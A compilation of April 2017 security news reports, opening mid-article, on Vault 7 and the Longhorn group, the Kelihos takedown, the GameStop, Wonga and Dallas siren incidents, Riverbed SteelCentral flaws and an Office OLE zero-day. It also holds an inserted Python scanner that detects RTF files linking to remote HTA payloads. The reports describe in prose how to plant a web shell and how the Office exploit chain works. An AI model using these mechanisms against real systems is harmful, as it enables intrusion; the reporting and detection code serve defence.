Since the attack does not work when a malicious document is viewed in Office Protected View, users are advised to enable this feature in order to view any Office documents.
For more technical details about the latest Dridex malware campaign exploiting the unpatched Microsoft Word flaw, you can head on to the blog post published by Proofpoint.
Spain Arrests Russian Suspected of Influencing the US Election
11.4.2017 Novinky/Bezpečnost Kriminalita
Spanish police have arrested in Barcelona a Russian programmer whom the US Federal Bureau of Investigation (FBI) suspects of taking part in influencing last year's US presidential election. According to the daily El País, a Spanish court confirmed on Monday that 36-year-old Pjotr Levašov is in custody and awaiting a decision on extradition to the United States.
The alleged Russian hacker, who according to Russian television RT comes from St. Petersburg, was arrested several days ago in Barcelona. The Russian broadcaster also said that Levašov was in Spain on holiday with his wife and son.
“I spoke with my husband on the phone. He said they told him he had created a computer virus that had ´something to do with Trump's election victory´,” Marija Levašovová said, according to El País. She added that her husband had been arrested on the basis of a US warrant accusing him of taking part in Russian cyber-espionage on behalf of Donald Trump.
He Allegedly Operated the Kelihos Botnet
The alleged secret pre-election cooperation between the team of current president Donald Trump and Russia is being investigated by several committees of the US Congress. The FBI and the National Security Agency (NSA) believe that Russia tried to damage the Democratic candidate Hillary Clinton and help her Republican rival Trump get elected.
According to the US Department of Justice, Levašov had operated a worldwide network of infected computers, a so-called botnet, since roughly 2010. Levašov's network is called Kelihos, and tens of thousands of computers running Microsoft's Windows operating system gradually became part of it. The Department of Justice announced today, according to Reuters, that it has launched an operation to dismantle the Kelihos botnet. Part of the operation is the creation of servers that will block the control commands sent to the infected computers.
Beware of a New Batch of E-mails From “Česká spořitelna”. They Can Infect Your Computer
11.4.2017 Cnews.cz Phishing
A new wave of fraudulent e-mails is pouring into the mailboxes of Czech internet users. This time they pose as having been sent by Česká spořitelna. The signature in the message and the sender's address both match. The address, however, is no guarantee of anything; it can easily be forged.
Česká spořitelna warns that the e-mail contains malware hidden in an attachment in JAR format (a Java application). It does not say, however, what exactly happens after the attachment is opened or how the malware behaves. The text of the e-mail itself should be warning enough: no bank would allow itself to send such an impersonal message.
A new fraudulent e-mail posing as Česká spořitelna
WikiLeaks CIA Files Linked to Espionage Group
11.4.2017 securityweek BigBrothers
Researchers at Symantec have analyzed the Vault 7 files published in recent weeks by WikiLeaks and determined that they are very similar to ones used by a cyberespionage group tracked by the security firm as “Longhorn.”
The Vault 7 leaks cover exploits and tools allegedly used by the U.S. Central Intelligence Agency (CIA) to hack a wide range of systems, including PCs, Macs, mobile devices and IoT products. Based on an analysis of the files, Symantec is fairly confident that some of the Vault 7 documents describe the tools and techniques used by Longhorn.
According to the security firm, Longhorn is a threat group that has been around since at least 2011, but possibly as early as 2007. Symantec has been tracking the APT since 2014, when it used a Windows zero-day exploit (CVE-2014-4148) to deliver a backdoor called Plexor.
Researchers have observed Longhorn attacks aimed at more than 40 targets across 16 different countries in Europe, Asia (Middle East and other regions) and Africa. The list of targets includes governments, international organizations, and companies in the telecoms, financial, aerospace, energy, IT, education, and national resources sectors. Symantec pointed out that all of the targeted entities could present an interest to a nation-state actor.
An analysis of Longhorn’s tools and working hours suggests that the group is located in North America and its members are English speakers.
The CIA has neither confirmed nor denied that the Vault 7 files are authentic. The agency said its mission is to collect foreign intelligence from overseas entities, and pointed out that it is legally prohibited from spying on Americans.
Symantec noted that it did detect one Longhorn malware infection in the United States, but an uninstaller was launched within hours, which could indicate that the computer had been infected unintentionally.
In addition to Plexor, Longhorn has used several other pieces of malware in its operations, including Trojans dubbed Corentry, LH1 and LH2.
Corentry’s development timeline coincides with the dates mentioned in a changelog file published by WikiLeaks for a tool called Fluxwire. Experts also determined that the Plexor backdoor is very similar to a tool named in the Vault 7 documents “Fire and Forget.”
Researchers also found similarities between the cryptographic protocols described in the Vault 7 files and the ones used by Longhorn.
“Other Vault 7 documents outline tradecraft practices to be used, such as use of the Real-time Transport Protocol (RTP) as a means of command and control (C&C) communications, employing wipe-on-use as standard practice, in-memory string de-obfuscation, using a unique deployment-time key for string obfuscation, and the use of secure erase protocols involving renaming and overwriting. Symantec has observed Longhorn tools following all of these practices,” the security firm said in a blog post.
If confirmed, Longhorn would be the second cyber espionage group whose activities have been tied to the U.S. government. The first was the NSA-linked Equation Group, whose mistakes were analyzed by the individuals who developed the Vault 7 tools.
Symantec confirms that Longhorn group is tied to CIA operators detailed in Vault 7
11.4.2017 securityaffairs BigBrothers
Symantec reportedly linked the CIA hacking tools to several cyber attacks powered over the years by the Longhorn group.
Security experts who analyzed the alleged CIA hacking tools included in the Vault 7 dump found that they have been used against at least 40 governments and private organizations across 16 countries.
Researchers at security firm Symantec reportedly linked the CIA hacking tools to a number of cyber attacks launched in recent years by a threat actor the company identified as the Longhorn group.
“Spying tools and operational protocols detailed in the recent Vault 7 leak have been used in cyberattacks against at least 40 targets in 16 different countries by a group Symantec calls Longhorn. Symantec has been protecting its customers from Longhorn’s tools for the past three years and has continued to track the group in order to learn more about its tools, tactics, and procedures.” reads the analysis published by Symantec.
“The tools used by Longhorn closely follow development timelines and technical specifications laid out in documents disclosed by WikiLeaks.”
Symantec believes Longhorn is a North American hacking group that has been active since at least 2011. The group is very sophisticated and has used zero-day exploits and complex malware to conduct targeted attacks against governments and organizations in almost every industry, including financial, energy, telecommunications, education and aerospace.
The Longhorn group is a well-resourced hacking team that operated on a standard Monday to Friday working week in an American time zone. The nature of the targets and its Techniques, Tactics, and Procedures (TTPs) suggests the Longhorn group is a state-sponsored crew.
The targets were all located in the Middle East, Europe, Asia, and Africa. In one case, the researchers observed the Longhorn group compromising a computer in the US; following the infection, an uninstaller was quickly executed, which demonstrates that this victim was infected unintentionally.
“The Longhorn group shares some of the same cryptographic protocols specified in the Vault 7 documents, in addition to following leaked guidelines on tactics to avoid detection.” continues Symantec. “Given the close similarities between the tools and techniques, there can be little doubt that Longhorn’s activities and the Vault 7 documents are the work of the same group.”
Digging into the Vault 7 archive, the experts discovered the Fluxwire cyber espionage malware. The documents related to this malware include a changelog of the dates on which new features were added to the malicious code; the features and the timeline are consistent with the development cycle of the Corentry malware created by the Longhorn APT.
“These dates align closely with the development of one Longhorn tool (Trojan.Corentry) tracked by Symantec. New features in Corentry consistently appeared in samples obtained by Symantec either on the same date listed in the Vault 7 document or several days later, leaving little doubt that Corentry is the malware described in the leaked document.” reads Symantec.
“Early versions of Corentry seen by Symantec contained a reference to the file path for the Fluxwire program database (PDB) file. The Vault 7 document lists removal of the full path for the PDB as one of the changes implemented in Version 3.5.0.”
“Up until 2014, versions of Corentry were compiled using GCC [GNU Compiler Collection]. According to the Vault 7 document, Fluxwire switched to an MSVC compiler for version 3.3.0 on February 25, 2015. This was reflected in samples of Corentry, where a version compiled on February 25, 2015, had used MSVC as a compiler.”
A second document in the Vault 7 archive details Fire and Forget, a specification for user-mode injection of a payload by a tool called Archangel.
The specification of the malicious code and the interface used to load it matches the Longhorn tool called Backdoor.Plexor.
The experts discovered many other similarities. Another leaked CIA document outlined cryptographic protocols that should be implemented in malware development.
“A third document outlines cryptographic protocols that malware tools should follow. These include the use of inner cryptography within SSL to prevent man-in-the-middle (MITM) attacks, key exchange once per connection, and use of AES with a 32-bit key. These requirements align with the cryptographic practices observed by Symantec in all of the Longhorn tools.” continues Symantec.
Another Vault 7 document recommends the use of in-memory string de-obfuscation and the Real-time Transport Protocol (RTP) for communicating with the command and control (C&C) servers.
All the above techniques and protocols were implemented in all the hacking tools of the Longhorn group.
Researchers from Symantec discovered a number of indicators that confirm Longhorn was from an English-speaking, North American country.
“The acronym MTWRFSU (Monday Tuesday Wednesday ThuRsday Friday Saturday SUnday) was used to configure which day of the week malware would communicate with the attackers. This acronym is common in academic calendars in North America.” reads Symantec. “Some of the code words found in the malware, such as SCOOBYSNACK, would be most familiar in North America. In addition to this, the compilation times of tools with reliable timestamps indicate a time zone in the Americas.”
In summary, there is no doubt that the Longhorn group has the same capabilities and hacking tools as the CIA operators documented in the Vault 7 files.
Symantec Connects 40 Cyber Attacks to CIA Hacking Tools Exposed by Wikileaks
11.4.2017 thehackernews BigBrothers
Security researchers have confirmed that the alleged CIA hacking tools recently exposed by WikiLeaks have been used against at least 40 governments and private organizations across 16 countries.
Since March, as part of its "Vault 7" series, Wikileaks has published over 8,761 documents and other confidential information that the whistleblower group claims came from the US Central Intelligence Agency (CIA).
Now, researchers at cybersecurity company Symantec reportedly managed to link those CIA hacking tools to numerous real cyber attacks in recent years that have been carried out against the government and private sectors across the world.
Those 40 cyber attacks were conducted by Longhorn — a North American hacking group that has been active since at least 2011 and has used backdoor trojans and zero-day attacks to target government, financial, energy, telecommunications, education, aerospace, and natural resources sectors.
Although the group's targets were all in the Middle East, Europe, Asia, and Africa, researchers said the group once infected a computer in the United States, but an uninstaller was launched within an hour, which indicates the "victim was infected unintentionally."
What's interesting is that Symantec linked some of CIA hacking tools and malware variants disclosed by Wikileaks in the Vault 7 files to Longhorn cyber espionage operations.
Fluxwire (Created by CIA) ≅ Corentry (Created by Longhorn)
Fluxwire, a cyber espionage malware allegedly created by the CIA and mentioned in the Vault 7 documents, contains a changelog of dates for when new features were added, which according to Symantec closely resembles the development cycle of "Corentry," a malware created by the Longhorn hacking group.
"Early versions of Corentry seen by Symantec contained a reference to the file path for the Fluxwire program database (PDB) file," Symantec explains. "The Vault 7 document lists removal of the full path for the PDB as one of the changes implemented in Version 3.5.0."
"Up until 2014, versions of Corentry were compiled using GCC [GNU Compiler Collection]. According to the Vault 7 document, Fluxwire switched to an MSVC compiler for version 3.3.0 on February 25, 2015. This was reflected in samples of Corentry, where a version compiled on February 25, 2015, had used MSVC as a compiler."
Similar Malware Modules
Another Vault 7 document details 'Fire and Forget' specification of the payload and a malware module loader called Archangel, which Symantec claims, match almost perfectly with a Longhorn backdoor called Plexor.
"The specification of the payload and the interface used to load it was closely matched in another Longhorn tool called Backdoor.Plexor," says Symantec.
Use of Similar Cryptographic Protocol Practices
Another leaked CIA document outlined cryptographic protocols that should be used within malware tools, such as using AES encryption with a 32-bit key, inner cryptography within SSL to prevent man-in-the-middle attacks, and key exchanges once per connection.
One leaked CIA document also recommends using in-memory string de-obfuscation and the Real-time Transport Protocol (RTP) for communicating with the command and control (C&C) servers.
According to Symantec, these cryptographic protocol and communication practices were also used by the Longhorn group in all of its hacking tools.
More About LongHorn Hacking Group
Longhorn has been described as a well-resourced hacking group that works on a standard Monday to Friday working week — likely a behavior of a state-sponsored group — and operates in an American time zone.
Longhorn's advanced malware tools are specially designed for cyber espionage with detailed system fingerprinting, discovery, and exfiltration capabilities. The group uses extremely stealthy capabilities in its malware to avoid detection.
Symantec's analysis of the group's activities also shows that Longhorn is from an English-speaking North American country, with the code words it uses referring to the band The Police (REDLIGHT and ROXANNE) and to colloquial terms like "scoobysnack."
Overall, the functionality described in the CIA documents and its links to the group activities leave "little doubt that Longhorn's activities and the Vault 7 documents are the work of the same group."
US Takes Down Huge Botnet as Spain Arrests Notorious Russian Hacker
11.4.2017 securityweek BotNet
U.S. Authorities Take Down Kelihos Botnet as Alleged Creator is Arrested in Spain
US authorities moved Monday to take down a global computer botnet behind the massive theft of personal data and unwanted spam emails, as Spain arrested the notorious Russian hacker who operated it.
US authorities say the Russian, Piotr or Peter Levashov, had operated the Kelihos network of tens of thousands of infected computers, stealing personal data and renting the network out to others to send spam emails by the millions and extort ransom from computer owners.
Levashov, also known in the hacking world as Peter Severa, was arrested at Barcelona airport on Friday at the US request.
A Spanish judge on Monday ordered him to be remanded in custody as Washington is expected to seek his extradition.
Spanish police said in a statement late Monday that the arrest was the result of a "complex inquiry carried out in collaboration with the American FBI."
A US indictment unsealed Monday said Levashov, 36 and a native of St. Petersburg, had operated the Kelihos botnet since around 2010.
It was not the first time US officials have gone after him. In 2008 he was indicted as a Russia-based partner of the leading US spammer, Alan Ralsky. Ralsky and others were jailed in that case but Levashov was never caught.
100,000 computers infected
The Kelihos network is made up of private computers around the world running the Microsoft Windows operating system. The computers are infected with malware that gives Levashov the ability to control them remotely, with the owners completely unaware.
According to the Justice Department, at times the number of computers in the network has topped 100,000, with between five and 10 percent of them in the United States.
Through underground networks, Kelihos sold the network's services to others, who would use it to send out spam emails advertising counterfeit drugs, work-at-home scams, and other fraud schemes, the indictment said.
They were also used for illegal "pump-and-dump" stock market manipulation schemes, and to spread other malware through which hackers could steal a user's banking account information including passwords, and lock up a computer's information to demand huge ransoms.
The indictment called Levashov "one of the world's most notorious criminal spammers."
The Spamhaus Project, which documents spam, botnets, malware and other abuse, listed him as seventh on its "10 Worst Spammers" list and "one of the longest operating criminal spam-lords on the internet."
"The ability of botnets like Kelihos to be weaponized quickly for vast and varied types of harms is a dangerous and deep threat to all Americans, driving at the core of how we communicate, network, earn a living, and live our everyday lives," said Acting US Assistant Attorney General Kenneth Blanco in a statement.
Using legal 'malware' against botnet
Levashov's arrest was unrelated to investigations into Russian interference in last year's US presidential election, US officials said.
Earlier, the suspect's wife had told Russia Today that his arrest was connected to the election hacking case.
A Spanish court specializing in international cases will rule on whether he will be sent to the US.
The US has 40 days to present evidence backing Levashov's extradition, which the suspect opposes.
In parallel with the arrest, US justice authorities announced an extraordinary move to bring down the Kelihos network, obtaining warrants that allow it to install its own malware-like programs on computers in the network to intercept its operation.
Such a move appeared to be the first ever application of controversial new investigative powers which took effect late last year.
The Justice Department explained that its programs would be able to redirect Kelihos-infected computers into substitute servers in order to halt the network's operation.
In doing so, it can record the private IP or internet protocol addresses of the computers and provide them to internet service providers to help customers eliminate the infections, the department explained.
In a warrant that permitted investigators to "infect" botnet computers in order to block Kelihos, investigators pledged to guard the privacy of computer owners.
"This operation will not capture content from the target computers or modify them in any other capacity except limiting the target computers' ability to interact with the Kelihos botnet," the warrant said.
Hackers Steal Customer Card Data From GameStop
11.4.2017 securityweek Crime
Video gaming retail company GameStop appears to have been breached, with an unknown number of customers' payment card details stolen.
Those details are thought to include customer card number, expiration date, name, address and card verification value (CVV2), usually a 3-digit security code printed on the back of the card.
The breach is thought to affect only online customers at the website GameStop.com, without affecting any of GameStop's high street stores.
The breach was first reported by KrebsOnSecurity, Friday. Krebs blogged about the incident and also contacted GameStop, who immediately acknowledged the breach.
Two sources in the finance industry told Krebs they had received reports from a credit card processor indicating that GameStop had probably been compromised between September 2016 and February 2017. The credit card processor will undoubtedly have informed GameStop; but the brevity of the 'security update' on the GameStop website suggests it has only recently become aware of the breach.
"GameStop recently received notification from a third party," says the statement, "that it believed payment card data from cards used on the GameStop.com website was being offered for sale on a website. That day a leading security firm was engaged to investigate these claims. GameStop has and will continue to work non-stop to address this report and take appropriate measures to eradicate any issue that may be identified."
Noticeably for a company that has lost customer data, there is no offer of free credit monitoring for those affected -- just the statement, "GameStop would like to remind its customers that it is always advisable to monitor payment card account statements for unauthorized charges." Hopefully, that simply means that GameStop doesn't yet know which or how many of its customers were compromised.
What isn't yet clear is the extent of the breach. It is assumed that malware intercepted the card details before they were encrypted onsite. This assumption is based on the belief that the CVV2 code was also stolen. Since companies are not supposed to store this code, it is assumed the malware stole the details before it was discarded.
However, the reality is that hackers seem to have been in the system for at least five months, unnoticed. It is perfectly feasible that they were able to steal more than just the card details. Christopher Boyd, a malware intelligence analyst at Malwarebytes, told SecurityWeek, "Even without considering the ramifications of swiped payment information, any compromise of a company selling video games to the public could prove to be a huge boon for a scammer. If they could obtain lists of titles purchased, for example, they could try phishing for specific games that require a login. Beyond that, they could identify certain titles as running on a gaming platform -- again, with its own login credentials.
"From there, they could sell those accounts on at a profit, or use them to phish further gamers. In this case, the information currently available suggests scammers may 'only' have payment information, but the danger is there to cause untold problems for people if just a little more (seemingly harmless) data were to be included."
At the very least the incident demonstrates just how hard it is for defenders to detect an attacker once inside the system. Once again it seems that the breach was only uncovered by a third-party when the attackers started to monetize the theft.
Hacker Caused Panic in Dallas by Turning ON Every Emergency Siren at Once
10.4.2017 thehackernews Hacking
We have seen hackers flooding 911 emergency service with rogue requests to knock the service offline for an entire state, but some hacking incidents are worse than others.
One such incident took place in Dallas on Friday night when a hacker triggered a network of 156 emergency warning sirens for about two hours, waking up residents and sparking fears of a disaster.
The emergency warning sirens — designed to warn citizens of Texas about dangerous weather conditions, such as severe storms and tornadoes — were activated around 11:40 p.m. Friday and lasted until 1:20 a.m. Saturday.
The city officials tried to inform residents not to call 911 as there was not any emergency situation in the city, but the 911 system was nevertheless flooded with over 4,400 calls from panicked residents.
Rocky Vaz, director of Dallas Office of Emergency Management (OEM), told the Dallas Morning News that the alarms blasted about 15 times for 90-second durations. You can even watch video footage of the incident posted by some people on the social media.
The OEM technicians were eventually able to shut down the warning system and are working to keep this from happening again by implementing "more safeguards."
The city officials said the sirens were set off by a hacker who compromised the Dallas city's emergency alert system, but they did not disclose how the system was compromised or who may be responsible for the attack.
"We can state at this time that the City’s siren system was hacked Friday night," the Dallas Public Information Office confirmed on Saturday. "For security reasons, we cannot discuss the details of how this was done, but we do believe that the hack came from the Dallas area."
The officials have notified the Federal Communications Commission (FCC) for assistance in identifying the exact source of the hack.
This is the second time a hacker has attacked critical infrastructure in the city. Last year, an unknown hacker broke into some traffic signals in Dallas and used them to display jokes.
Dallas Mayor Mike Rawlings noted on his Facebook page that the incident is yet "another serious example of the need for us to upgrade and better safeguard our city’s technology infrastructure," adding that they’re working on identifying and prosecuting those responsible for the attack.
British Payday Loan Firm Wonga Suffers Data Breach
10.4.2017 securityweek CyberCrime
British payday loan company Wonga has informed customers that their personal and financial data may have been stolen in a cyberattack.
According to Wonga, hackers gained unauthorized access to names, email addresses, physical addresses, phone numbers, partial payment card numbers (i.e. the last four digits), bank account numbers, and sort codes. The firm’s investigation is ongoing.
Wonga says there is no evidence that passwords have been compromised, but users who are concerned can change their passwords as a precaution. Impacted individuals are being notified.
The Guardian reported that the incident may have affected as many as 270,000 current and former customers in the United Kingdom and Poland. Roughly 245,000 of the potential victims are from the U.K.
While complete payment card data is not at risk, Wonga says it will alert financial institutions, and it has advised customers to contact their bank and ask them to be on the lookout for any suspicious activity.
The company has also warned affected customers of scams and other online activities that may leverage this incident in an effort to trick users into handing over sensitive information.
This is one of the biggest known data breaches suffered by a U.K. company. In recent months, breaches have also been reported by Camelot, which runs the U.K. National Lottery, business software firm Sage, and telecoms company Three.
The country’s Information Commissioner's Office (ICO) has launched an investigation into the incident, and it could lead to a significant fine. Telecoms firm TalkTalk received a record fine of £400,000 (roughly half a million dollars) for the October 2015 breach that affected more than 150,000 customers. The ICO can issue a maximum fine of £500,000 ($620,000).
Hack Sets Off City Emergency Alarms in Dallas
10.4.2017 securityweek Cyber
The City of Dallas, Texas, emergency alarm system was compromised by a hacker or hackers late Friday night. All 156 outside sirens, usually used for severe weather warnings, were activated more than a dozen times between approximately 11:45 pm Friday and 1:20 am Saturday until engineers manually disabled the system.
The Dallas Outdoor Warning Sirens are designed to alert people outside to go indoors for shelter and information. The sirens are not meant to be heard indoors. Their primary function is to warn of imminent severe weather; but with no immediate sign of this, some people worried about reprisals for recent US military action in Syria.
The 911 emergency service, already under pressure through staff shortage, received approximately double its usual number of calls; and waiting time at its worst increased from the usual 10 seconds to around six minutes.
No details of the hack have yet been released, although it is believed the attacker is from the Dallas area. "For security reasons," said spokeswoman Sana Syed, "we cannot discuss the details of how this was done, but we do believe that the hack came from the Dallas area. We have notified the FCC for assistance in identifying the source of this hack. We are putting in safeguards to ensure this type of hack does not happen again."
Attacks against emergency alert systems are rare, but not unknown. In 2013, hackers breached an emergency alert system (EAS), causing TV stations in Michigan, California, Montana and New Mexico to broadcast a zombie warning, "the bodies of the dead are rising from their graves and attacking the living."
Dallas engineers are thought to have located the source of their own breach, and have ruled out both their control system and remote access. If the attacker breached the communications channels this could explain the belief that he or they are local to the area.
At the time of writing, the police had not been notified.
Dallas Mayor Mike Rawlings commented on Facebook, "This is yet another serious example of the need for us to upgrade and better safeguard our city's technology infrastructure. It's a costly proposition, which is why every dollar of taxpayer money must be spent with critical needs such as this in mind."
In November 2016, the City Council approved a $567,368 budget to maintain and repair the emergency sirens over the next six years. Michigan-based West Shore Services, a distributor of Federal Signal outdoor warning products, won the contract.
When approached over the weekend, West Shore's director of operations, Luke Miller, had not been informed of the breach by the Dallas Office of Emergency Management. "I am trying to get information along with everyone else," he said. "I don't know anything."
Martin Zinaich, chief security officer for the city of Tampa, Florida, told SecurityWeek, "We keep putting more and more 'things' (including critical infrastructure) on a public network that everyone in the world, both good and bad, have access to -- yet we still do not have information security being considered as part of a complete business risk profile."
Zinaich believes it is symptomatic of an ever-worsening cyber security condition that will require drastic action to solve. In a paper comparing cyber security to the long, slow descent and ultimate destruction of Eastern Air Lines Flight 401, he says, "In short, what we have put in place are insecure computing devices connected together using insecure protocols over a fabric connected to support some of our most critical dependencies and let anyone in the world -- good or bad -- have access to it."
His own solution would be for American CISOs to come together in a professional association, similar to the AMA, so that together they could influence the quality of security much as the AMA has influenced and improved the quality of medicine.
Serious Vulnerabilities Found in Riverbed SteelCentral Portal
10.4.2017 securityweek Vulnerebility
Researchers at vulnerability management services provider Digital Defense have identified four security holes in Riverbed SteelCentral, a popular application and network performance monitoring product.
The flaws affect the SteelCentral Portal application and they can be exploited by unauthenticated attackers for remote command execution and to obtain user information. The vulnerabilities were reported to Riverbed Technology in January and they were later patched by the vendor.
According to Digital Defense, there are two remote command execution vulnerabilities that can be exploited to take full control of the host running the SteelCentral Portal application, and from there hijack all connected data sources using administrator credentials.
One of the flaws, related to the UploadImageServlet function, can be exploited to upload arbitrary files to a directory that is remotely accessible. An attacker can upload a JavaServer Page (JSP) shell that allows execution of arbitrary commands with SYSTEM privileges.
The second RCE weakness is related to the H2 web console, a service that can be accessed remotely without authentication. In its advisory, Digital Defense said the H2 console is designed for access during development, but it’s still present in the default installation of the SteelCentral Portal.
Researchers determined that the console can be used to access the Portal’s PostgreSQL database – this database normally doesn’t allow remote connections, but the H2 console bypasses the restriction by connecting from localhost.
“Once connected to the PostgreSQL database, an attacker can create a new table; insert the file content for a JSP shell into the table, then export the table contents to a file in the root directory of the web application. An attacker can then gain access to a web shell without authentication, and run arbitrary commands with SYSTEM privileges,” Digital Defense said in its advisory.
Experts have also identified two information disclosure flaws that can be exploited by unauthenticated attackers to enumerate usernames. Once the usernames are obtained, a hacker can launch a brute-force attack against the SteelCentral Portal interface.
Researchers managed to exploit the vulnerabilities in versions 1.3.1 and 1.4.0. Riverbed customers can obtain information on the patches through the company’s support portal.
Another Russian Hacker Arrested In Spain Reportedly Over U.S. Election Hacking
10.4.2017 thehackernews CyberCrime
A Russian computer hacker and alleged spam kingpin was arrested in Barcelona, Spain, on Friday reportedly over suspicion of being involved in hacking attacks linked to alleged interference in last year's United States presidential election process.
36-year-old Pyotr Levashov from St. Petersburg was detained by police in Barcelona after US authorities issued an international arrest warrant for his arrest.
While the Russian embassy in Madrid announced Levashov's arrest on Sunday, it did not confirm the reason for his arrest.
This is the second arrest made by the Spanish authorities since the US 2016 election. In January, the police detained Stanislav Lisov, 32, on suspicion of creating and operating the NeverQuest Banking Trojan and possibly influencing the presidential election in Donald Trump's favor.
US authorities are planning to request the extradition of both hackers to the United States, where they are facing charges for their hacking-related crimes.
During an interview with Russian press agency RT, Levashov's wife Maria said that her husband was held "at the request of the American authorities in connection with cyber crime."
Maria spoke with Spanish officials, who mentioned "something about a virus that was supposedly created by [her] husband" and was related to Trump's victory in last year's presidential race.
Western security researchers have identified Levashov as Peter Severa (aka Peter Levashov) – the man who has also been listed in the world's Top 10 Worst Spammers maintained by anti-spam group Spamhaus, which has given him the 7th position in the list.
Peter Carr, a spokesperson for the Criminal Division of the US Department of Justice, told the news agency that "the US case remains under seal, so [they] have no information to provide at this time."
The US government has repeatedly accused Russia of hacking the Democratic Party and leaking personal data in order to influence the election results in favor of Donald Trump, though Russian officials have repeatedly denied the accusations.
Congressional committees and the Federal Bureau of Investigation are examining links between Russia and Trump.
Critical Office Zero-Day Exploited in Attacks
10.4.2017 securityweek Vulnerebility
An unpatched critical vulnerability in Microsoft Office is being exploited by malicious actors to achieve full code execution on target machines, McAfee and FireEye security researchers warn.
The vulnerability resides in the Object Linking and Embedding (OLE) functionality in Office and can be abused to create malicious RTF (Rich Text Format) documents that link to HTA (HTML Application) files hosted on remote servers. These HTA files load and execute a final malicious Visual Basic script.
“Because .hta is executable, the attacker gains full code execution on the victim’s machine,” McAfee explains, adding that the malicious RTF samples they observed were using the .doc extension.
Both McAfee and FireEye explain that this logical bug allows attackers to bypass memory-based mitigations developed by Microsoft, as well as other security products. The malicious documents are used to download and execute malicious payloads pertaining to various well-known malware families.
The HTA files used in the observed attacks were masquerading as normal RTF files to trick users and evade detection. When successful, the exploit closes the original Office document, then opens a new one and displays it to the victim, while the malicious code is being installed in the background.
“In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link,” FireEye explains.
The vulnerability was initially observed in January, but attacks that leverage it continue to surface, McAfee says. The security company said that all Office versions are affected by this issue, including Office 2016 on Windows 10.
According to FireEye, they too have been aware of the vulnerability for some time, but they have been coordinating with Microsoft for several weeks to release information on the matter only after a patch was available. Microsoft's next set of security patches is scheduled to roll out as soon as this Tuesday.
Users are advised to avoid opening Office files that come from unknown sources and to leave Office Protected View enabled to ensure no malicious code runs without their knowledge. Apparently, the vulnerability can’t bypass Protected View.
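One defensive check that follows from the mechanism described above, as an added example (not code from McAfee, FireEye or Microsoft): a heuristic scanner that flags an RTF when its embedded OLE object is marked for automatic update and carries a remote URL. It assumes the object sits in a standard hex-encoded \objdata stream and that the link uses the \objautlink or \objupdate control words; the sample documents are constructed inside the block.

```python
"""Heuristic detection for the document shape described above: an RTF whose
embedded OLE object is flagged for automatic update and points at a remote
URL (the HTA stage). Added example; not code from McAfee, FireEye or Microsoft."""
import re

# Control words that make Word resolve a linked object when the file opens.
# Assumption: the lure documents carry one of these; the article only says the
# RTF "links to" a remote HTA through OLE.
LINK_CONTROL_WORDS = (b"\\objautlink", b"\\objupdate")

# Embedded object payload in RTF is a hex string: {\*\objdata 0105...}
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")

# Remote URL stored as ASCII or as UTF-16LE (a URL moniker keeps its target
# as a wide string).
URL_ASCII_RE = re.compile(rb"https?://[\x21-\x7e]+", re.IGNORECASE)
URL_WIDE_RE = re.compile(
    rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00)+",
    re.IGNORECASE,
)


def decode_objdata(rtf: bytes) -> list[bytes]:
    """Return the raw bytes of every \\objdata block found in the document."""
    blobs = []
    for match in OBJDATA_RE.finditer(rtf):
        hexstr = re.sub(rb"\s+", b"", match.group(1))
        if len(hexstr) % 2:          # tolerate a truncated trailing nibble
            hexstr = hexstr[:-1]
        if hexstr:
            blobs.append(bytes.fromhex(hexstr.decode("ascii")))
    return blobs


def find_urls(blob: bytes) -> list[str]:
    """Extract http(s) URLs from object data, in either byte encoding."""
    urls = [m.group(0).decode("ascii") for m in URL_ASCII_RE.finditer(blob)]
    urls += [m.group(0).decode("utf-16-le") for m in URL_WIDE_RE.finditer(blob)]
    return urls


def scan_rtf(rtf: bytes) -> dict:
    """Report which indicators fired for one RTF document.

    'suspicious' is set when an auto-updating link AND a remote URL are both
    present; 'hta_link' is informational only, because the HTA stage was served
    under a misleading name in the observed attacks."""
    report = {"link_control_words": [], "remote_urls": [],
              "hta_link": False, "suspicious": False}
    for word in LINK_CONTROL_WORDS:
        if word in rtf:
            report["link_control_words"].append(word.decode("ascii"))
    for blob in decode_objdata(rtf):
        for url in find_urls(blob):
            report["remote_urls"].append(url)
            path = url.lower().split("?", 1)[0].rstrip("/")
            if path.endswith(".hta"):
                report["hta_link"] = True
    report["suspicious"] = bool(report["link_control_words"]) and bool(report["remote_urls"])
    return report


def build_sample(url: str, autolink: bool, wide: bool = True) -> bytes:
    """Constructed test document, not a real malicious sample: a minimal RTF whose
    object data carries `url` (UTF-16LE or ASCII) behind a short fake header."""
    target = url.encode("utf-16-le") if wide else url.encode("ascii")
    payload = b"\x01\x05\x00\x00" + target + b"\x00\x00"
    link = b"\\objautlink\\objupdate" if autolink else b"\\objemb"
    return (b"{\\rtf1\\ansi{\\object" + link + b"\\objw100\\objh100"
            b"{\\*\\objdata " + payload.hex().encode("ascii") + b"}}\\par Hello}")


if __name__ == "__main__":
    for label, doc in (("linked", build_sample("http://example.invalid/d.hta", True)),
                       ("embedded", build_sample("http://example.invalid/d.hta", False)),
                       ("plain", b"{\\rtf1\\ansi Hello}")):
        print(label, scan_rtf(doc))
```

A real triage pipeline would run this only as a first-pass filter and hand hits to an OLE parser; an object that is merely embedded (no update-on-open flag) is reported but not flagged.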
Alleged Kelihos Botnet Author Arrested in Spain
10.4.2017 securityweek BotNet
A Russian national arrested by the Spanish police last week is believed to be the programmer behind the infamous Kelihos spam botnet.
The man, Pyotr Levashov, was arrested in Barcelona, Spain, while on vacation, supposedly on an arrest warrant issued by United States authorities. The arrest has already been confirmed by the Russian embassy in Madrid, but no official details on why he was detained have been provided.
While mainstream media initially reported that the arrest might be tied to an interference in last year's U.S. election, it appears that Levashov was actually arrested for his involvement in the development and running of a large spam botnet.
In December 2016, the U.S. officially attributed election hacks to Russian threat groups, and also announced a series of sanctions against Russian nationals, also related to the election hacks. The attribution report, however, failed to achieve its purpose, security experts argued.
According to Reuters, Russian television station RT claimed a connection between Levashov’s arrest and the cybercriminal interference with the U.S. election, but a U.S. Department of Justice official has already confirmed that the arrest doesn’t have “an apparent national security connection.”
A NYTimes article also notes that Levashov doesn’t have an apparent connection to the election hacks, but that he is one of the most wanted spammers worldwide. Also known as Peter Severa, he is believed to be responsible for a long-running computer spam business.
